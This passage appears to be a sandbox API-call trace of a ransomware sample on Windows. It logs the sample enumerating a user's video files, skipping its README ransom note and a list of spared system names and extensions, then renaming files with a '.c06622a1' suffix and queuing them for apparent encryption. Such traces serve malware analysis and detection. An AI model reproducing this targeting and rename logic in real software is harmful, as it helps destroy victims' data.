Seed=0xf51018) returned 0x47a3b4fb [0156.764] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4b80094, Length=0x80) returned 0xb8dc8b09 [0156.764] RtlComputeCrc32 (PartialCrc=0x8b09, Buffer=0x4b80094, Length=0x80) returned 0xfab299f [0156.764] RtlComputeCrc32 (PartialCrc=0x299f, Buffer=0x4b80094, Length=0x80) returned 0x4defd6e9 [0156.764] RtlComputeCrc32 (PartialCrc=0xd6e9, Buffer=0x4b80094, Length=0x80) returned 0x4642a415 [0156.764] RtlComputeCrc32 (PartialCrc=0xa415, Buffer=0x4b80094, Length=0x80) returned 0x5d36ec3a [0156.764] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4b80020) returned 1 [0156.764] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.764] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.764] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbf973e0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbf973e0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbf973e0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.764] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.764] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5d8c1dd0, ftCreationTime.dwHighDateTime=0x1d5de63, ftLastAccessTime.dwLowDateTime=0x2253f700, ftLastAccessTime.dwHighDateTime=0x1d5dd83, ftLastWriteTime.dwLowDateTime=0x2253f700, ftLastWriteTime.dwHighDateTime=0x1d5dd83, nFileSizeHigh=0x0, nFileSizeLow=0x17aa9, dwReserved0=0x0, dwReserved1=0x0, cFileName="wy -GPkxHmMj.avi", cAlternateFileName="WY-GPK~1.AVI")) returned 1 [0156.764] _wcsicmp (_Str1="wy -GPkxHmMj.avi", _Str2="README.c06622a1.TXT") returned 5 [0156.764] wcsstr (_Str="wy -GPkxHmMj.avi", _SubStr="README") returned 0x0 [0156.764] _wcsicmp (_Str1="autorun.inf", _Str2="wy -GPkxHmMj.avi") returned -22 [0156.765] wcslen (_String="autorun.inf") returned 0xb [0156.765] _wcsicmp (_Str1="boot.ini", _Str2="wy -GPkxHmMj.avi") returned -21 [0156.765] wcslen (_String="boot.ini") returned 0x8 [0156.765] _wcsicmp (_Str1="bootfont.bin", _Str2="wy -GPkxHmMj.avi") returned -21 [0156.765] wcslen (_String="bootfont.bin") returned 0xc [0156.765] _wcsicmp (_Str1="bootsect.bak", _Str2="wy -GPkxHmMj.avi") returned -21 [0156.765] wcslen (_String="bootsect.bak") returned 0xc [0156.765] _wcsicmp (_Str1="desktop.ini", _Str2="wy -GPkxHmMj.avi") returned -19 [0156.765] wcslen (_String="desktop.ini") returned 0xb [0156.765] _wcsicmp (_Str1="iconcache.db", _Str2="wy -GPkxHmMj.avi") returned -14 [0156.765] wcslen (_String="iconcache.db") returned 0xc [0156.765] _wcsicmp (_Str1="ntldr", _Str2="wy -GPkxHmMj.avi") returned -9 [0156.765] wcslen (_String="ntldr") returned 0x5 [0156.765] _wcsicmp (_Str1="ntuser.dat", _Str2="wy -GPkxHmMj.avi") returned -9 [0156.765] wcslen (_String="ntuser.dat") returned 0xa [0156.765] _wcsicmp (_Str1="ntuser.dat.log", _Str2="wy -GPkxHmMj.avi") returned -9 [0156.765] wcslen (_String="ntuser.dat.log") returned 0xe [0156.765] _wcsicmp (_Str1="ntuser.ini", _Str2="wy -GPkxHmMj.avi") returned -9 [0156.765] wcslen (_String="ntuser.ini") returned 0xa [0156.765] _wcsicmp (_Str1="thumbs.db", _Str2="wy -GPkxHmMj.avi") returned -3 [0156.765] wcslen (_String="thumbs.db") returned 0x9 [0156.765] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.765] wcslen (_String="386") returned 0x3 [0156.765] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.765] wcslen (_String="adv") returned 0x3 [0156.765] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.765] wcslen (_String="ani") returned 0x3 [0156.765] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.765] wcslen (_String="bat") returned 0x3 [0156.765] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.765] wcslen (_String="bin") returned 0x3 [0156.765] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.765] wcslen (_String="cab") returned 0x3 [0156.766] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.766] wcslen (_String="cmd") returned 0x3 [0156.766] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.766] wcslen (_String="com") returned 0x3 [0156.766] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.766] wcslen (_String="cpl") returned 0x3 [0156.766] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.766] wcslen (_String="cur") returned 0x3 [0156.766] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.766] wcslen (_String="deskthemepack") returned 0xd [0156.766] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.766] wcslen (_String="diagcab") returned 0x7 [0156.766] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.766] wcslen (_String="diagcfg") returned 0x7 [0156.766] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.766] wcslen (_String="diagpkg") returned 0x7 [0156.766] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.766] wcslen (_String="dll") returned 0x3 [0156.766] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.766] wcslen (_String="drv") returned 0x3 [0156.766] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.766] wcslen (_String="exe") returned 0x3 [0156.766] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.766] wcslen (_String="hlp") returned 0x3 [0156.766] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.766] wcslen (_String="icl") returned 0x3 [0156.766] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.766] wcslen (_String="icns") returned 0x4 [0156.766] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.766] wcslen (_String="ico") returned 0x3 [0156.766] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.766] wcslen (_String="ics") returned 0x3 [0156.766] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.766] wcslen (_String="idx") returned 0x3 [0156.767] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.767] wcslen (_String="ldf") returned 0x3 [0156.767] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.767] wcslen (_String="lnk") returned 0x3 [0156.767] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.767] wcslen (_String="mod") returned 0x3 [0156.767] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.767] wcslen (_String="mpa") returned 0x3 [0156.767] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.767] wcslen (_String="msc") returned 0x3 [0156.767] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.767] wcslen (_String="msp") returned 0x3 [0156.767] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.767] wcslen (_String="msstyles") returned 0x8 [0156.767] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.767] wcslen (_String="msu") returned 0x3 [0156.767] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.767] wcslen (_String="nls") returned 0x3 [0156.767] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.767] wcslen (_String="nomedia") returned 0x7 [0156.767] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.767] wcslen (_String="ocx") returned 0x3 [0156.767] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.767] wcslen (_String="prf") returned 0x3 [0156.767] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.767] wcslen (_String="ps1") returned 0x3 [0156.767] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.767] wcslen (_String="rom") returned 0x3 [0156.767] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.767] wcslen (_String="rtp") returned 0x3 [0156.767] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.767] wcslen (_String="scr") returned 0x3 [0156.767] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.767] wcslen (_String="shs") returned 0x3 [0156.768] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.768] wcslen (_String="spl") returned 0x3 [0156.768] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.768] wcslen (_String="sys") returned 0x3 [0156.768] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.768] wcslen (_String="theme") returned 0x5 [0156.768] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.768] wcslen (_String="themepack") returned 0x9 [0156.768] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.768] wcslen (_String="wpx") returned 0x3 [0156.768] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.768] wcslen (_String="lock") returned 0x4 [0156.768] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.768] wcslen (_String="key") returned 0x3 [0156.768] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.768] wcslen (_String="hta") returned 0x3 [0156.768] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.768] wcslen (_String="msi") returned 0x3 [0156.768] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.768] wcslen (_String="pdb") returned 0x3 [0156.768] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0156.768] wcslen (_String="sql") returned 0x3 [0156.768] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.768] wcslen (_String="sqlite") returned 0x6 [0156.768] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds")) returned 0x10 [0156.768] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45600c0 [0156.768] wcscpy (in: _Dest=0x45600c0, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds" [0156.768] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds") returned 0x48 [0156.768] wcscpy (in: _Dest=0x4560152, _Source="wy -GPkxHmMj.avi" | out: _Dest="wy -GPkxHmMj.avi") returned="wy -GPkxHmMj.avi" [0156.769] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi", dwFileAttributes=0x80) returned 1 [0156.769] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\wy -gpkxhmmj.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x670 [0156.769] SetFilePointerEx (in: hFile=0x670, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0156.769] ReadFile (in: hFile=0x670, lpBuffer=0x3fe3f4, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fe484, lpOverlapped=0x0 | out: lpBuffer=0x3fe3f4*, lpNumberOfBytesRead=0x3fe484*=0x90, lpOverlapped=0x0) returned 1 [0156.770] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3fe3f4, Length=0x80) returned 0x57df1dd3 [0156.770] RtlComputeCrc32 (PartialCrc=0x1dd3, Buffer=0x3fe3f4, Length=0x80) returned 0x868766ff [0156.770] RtlComputeCrc32 (PartialCrc=0x66ff, Buffer=0x3fe3f4, Length=0x80) returned 0x62f804da [0156.770] RtlComputeCrc32 (PartialCrc=0x4da, Buffer=0x3fe3f4, Length=0x80) returned 0x56d5c372 [0156.770] RtlComputeCrc32 (PartialCrc=0xc372, Buffer=0x3fe3f4, Length=0x80) returned 0x4302cb50 [0156.770] CloseHandle (hObject=0x670) returned 1 [0156.770] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45700c8 [0156.770] wcscpy (in: _Dest=0x45700c8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi" [0156.770] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi") returned 0x59 [0156.770] wcscpy (in: _Dest=0x457017a, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0156.770] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\wy -gpkxhmmj.avi"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\wy -gpkxhmmj.avi.c06622a1"), dwFlags=0x8) returned 1 [0156.772] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn\\rBDds\\wy -GPkxHmMj.avi.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn\\rbdds\\wy -gpkxhmmj.avi.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x670 [0156.772] CreateIoCompletionPort (FileHandle=0x670, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0156.772] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4c10020 [0156.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x41ee3c8e [0156.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xd4655f8 [0156.778] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x336218da [0156.779] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4a3e0427 [0156.779] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7c10e2e9 [0156.779] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x443f9ed0 [0156.779] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7f1ac1e0 [0156.779] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x631a4068 [0156.782] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4c10094, Length=0x80) returned 0xdac9bf31 [0156.782] RtlComputeCrc32 (PartialCrc=0xbf31, Buffer=0x4c10094, Length=0x80) returned 0x17f3e398 [0156.782] RtlComputeCrc32 (PartialCrc=0xe398, Buffer=0x4c10094, Length=0x80) returned 0x45885937 [0156.782] RtlComputeCrc32 (PartialCrc=0x5937, Buffer=0x4c10094, Length=0x80) returned 0x8480b32c [0156.782] RtlComputeCrc32 (PartialCrc=0xb32c, Buffer=0x4c10094, Length=0x80) returned 0x6398d288 [0156.782] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4c10020) returned 1 [0156.782] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45600c0) returned 1 [0156.782] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45700c8) returned 1 [0156.782] FindNextFileW (in: hFindFile=0x2db8800, lpFindFileData=0x3fe56c | out: lpFindFileData=0x3fe56c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0156.782] FindClose (in: hFindFile=0x2db8800 | out: hFindFile=0x2db8800) returned 1 [0156.783] _wcsicmp (_Str1="backup", _Str2="rBDds") returned -16 [0156.783] wcslen (_String="backup") returned 0x6 [0156.783] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45300a8) returned 1 [0156.784] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x45400b0) returned 1 [0156.785] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdbdf44c0, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdbdf44c0, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdbdf44c0, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0156.785] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0156.785] FindNextFileW (in: hFindFile=0x2db87c0, lpFindFileData=0x3fe7ec | out: lpFindFileData=0x3fe7ec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x68ef8340, ftCreationTime.dwHighDateTime=0x1d5dee2, ftLastAccessTime.dwLowDateTime=0x1b875880, ftLastAccessTime.dwHighDateTime=0x1d5dd98, ftLastWriteTime.dwLowDateTime=0x1b875880, ftLastWriteTime.dwHighDateTime=0x1d5dd98, nFileSizeHigh=0x0, nFileSizeLow=0x17fb8, dwReserved0=0x0, dwReserved1=0x0, cFileName="TbTXIkRpC9ijh71zsc.avi", cAlternateFileName="TBTXIK~1.AVI")) returned 1 [0156.785] _wcsicmp (_Str1="TbTXIkRpC9ijh71zsc.avi", _Str2="README.c06622a1.TXT") returned 2 [0156.785] wcsstr (_Str="TbTXIkRpC9ijh71zsc.avi", _SubStr="README") returned 0x0 [0156.785] _wcsicmp (_Str1="autorun.inf", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -19 [0156.785] wcslen (_String="autorun.inf") returned 0xb [0156.785] _wcsicmp (_Str1="boot.ini", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -18 [0156.785] wcslen (_String="boot.ini") returned 0x8 [0156.785] _wcsicmp (_Str1="bootfont.bin", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -18 [0156.785] wcslen (_String="bootfont.bin") returned 0xc [0156.785] _wcsicmp (_Str1="bootsect.bak", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -18 [0156.785] wcslen (_String="bootsect.bak") returned 0xc [0156.785] _wcsicmp (_Str1="desktop.ini", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -16 [0156.785] wcslen (_String="desktop.ini") returned 0xb [0156.785] _wcsicmp (_Str1="iconcache.db", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -11 [0156.785] wcslen (_String="iconcache.db") returned 0xc [0156.785] _wcsicmp (_Str1="ntldr", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -6 [0156.785] wcslen (_String="ntldr") returned 0x5 [0156.785] _wcsicmp (_Str1="ntuser.dat", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -6 [0156.785] wcslen (_String="ntuser.dat") returned 0xa [0156.785] _wcsicmp (_Str1="ntuser.dat.log", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -6 [0156.785] wcslen (_String="ntuser.dat.log") returned 0xe [0156.785] _wcsicmp (_Str1="ntuser.ini", _Str2="TbTXIkRpC9ijh71zsc.avi") returned -6 [0156.785] wcslen (_String="ntuser.ini") returned 0xa [0156.785] _wcsicmp (_Str1="thumbs.db", _Str2="TbTXIkRpC9ijh71zsc.avi") returned 6 [0156.785] wcslen (_String="thumbs.db") returned 0x9 [0156.785] _wcsicmp (_Str1="386", _Str2="avi") returned -46 [0156.786] wcslen (_String="386") returned 0x3 [0156.786] _wcsicmp (_Str1="adv", _Str2="avi") returned -18 [0156.786] wcslen (_String="adv") returned 0x3 [0156.786] _wcsicmp (_Str1="ani", _Str2="avi") returned -8 [0156.786] wcslen (_String="ani") returned 0x3 [0156.786] _wcsicmp (_Str1="bat", _Str2="avi") returned 1 [0156.786] wcslen (_String="bat") returned 0x3 [0156.786] _wcsicmp (_Str1="bin", _Str2="avi") returned 1 [0156.786] wcslen (_String="bin") returned 0x3 [0156.786] _wcsicmp (_Str1="cab", _Str2="avi") returned 2 [0156.786] wcslen (_String="cab") returned 0x3 [0156.786] _wcsicmp (_Str1="cmd", _Str2="avi") returned 2 [0156.786] wcslen (_String="cmd") returned 0x3 [0156.786] _wcsicmp (_Str1="com", _Str2="avi") returned 2 [0156.786] wcslen (_String="com") returned 0x3 [0156.786] _wcsicmp (_Str1="cpl", _Str2="avi") returned 2 [0156.786] wcslen (_String="cpl") returned 0x3 [0156.786] _wcsicmp (_Str1="cur", _Str2="avi") returned 2 [0156.786] wcslen (_String="cur") returned 0x3 [0156.786] _wcsicmp (_Str1="deskthemepack", _Str2="avi") returned 3 [0156.786] wcslen (_String="deskthemepack") returned 0xd [0156.786] _wcsicmp (_Str1="diagcab", _Str2="avi") returned 3 [0156.786] wcslen (_String="diagcab") returned 0x7 [0156.786] _wcsicmp (_Str1="diagcfg", _Str2="avi") returned 3 [0156.786] wcslen (_String="diagcfg") returned 0x7 [0156.786] _wcsicmp (_Str1="diagpkg", _Str2="avi") returned 3 [0156.786] wcslen (_String="diagpkg") returned 0x7 [0156.786] _wcsicmp (_Str1="dll", _Str2="avi") returned 3 [0156.786] wcslen (_String="dll") returned 0x3 [0156.786] _wcsicmp (_Str1="drv", _Str2="avi") returned 3 [0156.786] wcslen (_String="drv") returned 0x3 [0156.786] _wcsicmp (_Str1="exe", _Str2="avi") returned 4 [0156.786] wcslen (_String="exe") returned 0x3 [0156.786] _wcsicmp (_Str1="hlp", _Str2="avi") returned 7 [0156.786] wcslen (_String="hlp") returned 0x3 [0156.787] _wcsicmp (_Str1="icl", _Str2="avi") returned 8 [0156.787] wcslen (_String="icl") returned 0x3 [0156.787] _wcsicmp (_Str1="icns", _Str2="avi") returned 8 [0156.787] wcslen (_String="icns") returned 0x4 [0156.787] _wcsicmp (_Str1="ico", _Str2="avi") returned 8 [0156.787] wcslen (_String="ico") returned 0x3 [0156.787] _wcsicmp (_Str1="ics", _Str2="avi") returned 8 [0156.787] wcslen (_String="ics") returned 0x3 [0156.787] _wcsicmp (_Str1="idx", _Str2="avi") returned 8 [0156.787] wcslen (_String="idx") returned 0x3 [0156.787] _wcsicmp (_Str1="ldf", _Str2="avi") returned 11 [0156.787] wcslen (_String="ldf") returned 0x3 [0156.787] _wcsicmp (_Str1="lnk", _Str2="avi") returned 11 [0156.787] wcslen (_String="lnk") returned 0x3 [0156.787] _wcsicmp (_Str1="mod", _Str2="avi") returned 12 [0156.787] wcslen (_String="mod") returned 0x3 [0156.787] _wcsicmp (_Str1="mpa", _Str2="avi") returned 12 [0156.787] wcslen (_String="mpa") returned 0x3 [0156.787] _wcsicmp (_Str1="msc", _Str2="avi") returned 12 [0156.787] wcslen (_String="msc") returned 0x3 [0156.787] _wcsicmp (_Str1="msp", _Str2="avi") returned 12 [0156.787] wcslen (_String="msp") returned 0x3 [0156.787] _wcsicmp (_Str1="msstyles", _Str2="avi") returned 12 [0156.787] wcslen (_String="msstyles") returned 0x8 [0156.787] _wcsicmp (_Str1="msu", _Str2="avi") returned 12 [0156.787] wcslen (_String="msu") returned 0x3 [0156.787] _wcsicmp (_Str1="nls", _Str2="avi") returned 13 [0156.787] wcslen (_String="nls") returned 0x3 [0156.787] _wcsicmp (_Str1="nomedia", _Str2="avi") returned 13 [0156.787] wcslen (_String="nomedia") returned 0x7 [0156.787] _wcsicmp (_Str1="ocx", _Str2="avi") returned 14 [0156.787] wcslen (_String="ocx") returned 0x3 [0156.787] _wcsicmp (_Str1="prf", _Str2="avi") returned 15 [0156.787] wcslen (_String="prf") returned 0x3 [0156.787] _wcsicmp (_Str1="ps1", _Str2="avi") returned 15 [0156.788] wcslen (_String="ps1") returned 0x3 [0156.788] _wcsicmp (_Str1="rom", _Str2="avi") returned 17 [0156.788] wcslen (_String="rom") returned 0x3 [0156.788] _wcsicmp (_Str1="rtp", _Str2="avi") returned 17 [0156.788] wcslen (_String="rtp") returned 0x3 [0156.788] _wcsicmp (_Str1="scr", _Str2="avi") returned 18 [0156.788] wcslen (_String="scr") returned 0x3 [0156.788] _wcsicmp (_Str1="shs", _Str2="avi") returned 18 [0156.788] wcslen (_String="shs") returned 0x3 [0156.788] _wcsicmp (_Str1="spl", _Str2="avi") returned 18 [0156.788] wcslen (_String="spl") returned 0x3 [0156.788] _wcsicmp (_Str1="sys", _Str2="avi") returned 18 [0156.788] wcslen (_String="sys") returned 0x3 [0156.788] _wcsicmp (_Str1="theme", _Str2="avi") returned 19 [0156.788] wcslen (_String="theme") returned 0x5 [0156.788] _wcsicmp (_Str1="themepack", _Str2="avi") returned 19 [0156.788] wcslen (_String="themepack") returned 0x9 [0156.788] _wcsicmp (_Str1="wpx", _Str2="avi") returned 22 [0156.788] wcslen (_String="wpx") returned 0x3 [0156.788] _wcsicmp (_Str1="lock", _Str2="avi") returned 11 [0156.788] wcslen (_String="lock") returned 0x4 [0156.788] _wcsicmp (_Str1="key", _Str2="avi") returned 10 [0156.788] wcslen (_String="key") returned 0x3 [0156.788] _wcsicmp (_Str1="hta", _Str2="avi") returned 7 [0156.788] wcslen (_String="hta") returned 0x3 [0156.788] _wcsicmp (_Str1="msi", _Str2="avi") returned 12 [0156.788] wcslen (_String="msi") returned 0x3 [0156.788] _wcsicmp (_Str1="pdb", _Str2="avi") returned 15 [0156.788] wcslen (_String="pdb") returned 0x3 [0156.788] _wcsicmp (_Str1="sql", _Str2="avi") returned 18 [0156.788] wcslen (_String="sql") returned 0x3 [0156.788] _wcsicmp (_Str1="sqlite", _Str2="avi") returned 18 [0156.788] wcslen (_String="sqlite") returned 0x6 [0156.789] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\P2SDJqjsKJSaPnHQeAI\\e6Wwn" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\p2sdjqjskjsapnhqeai\\e6wwn")) returned 0x10 [0156.789] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x45300a8 [0156.789] wcscpy (in: _Dest=0x45300a8, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS 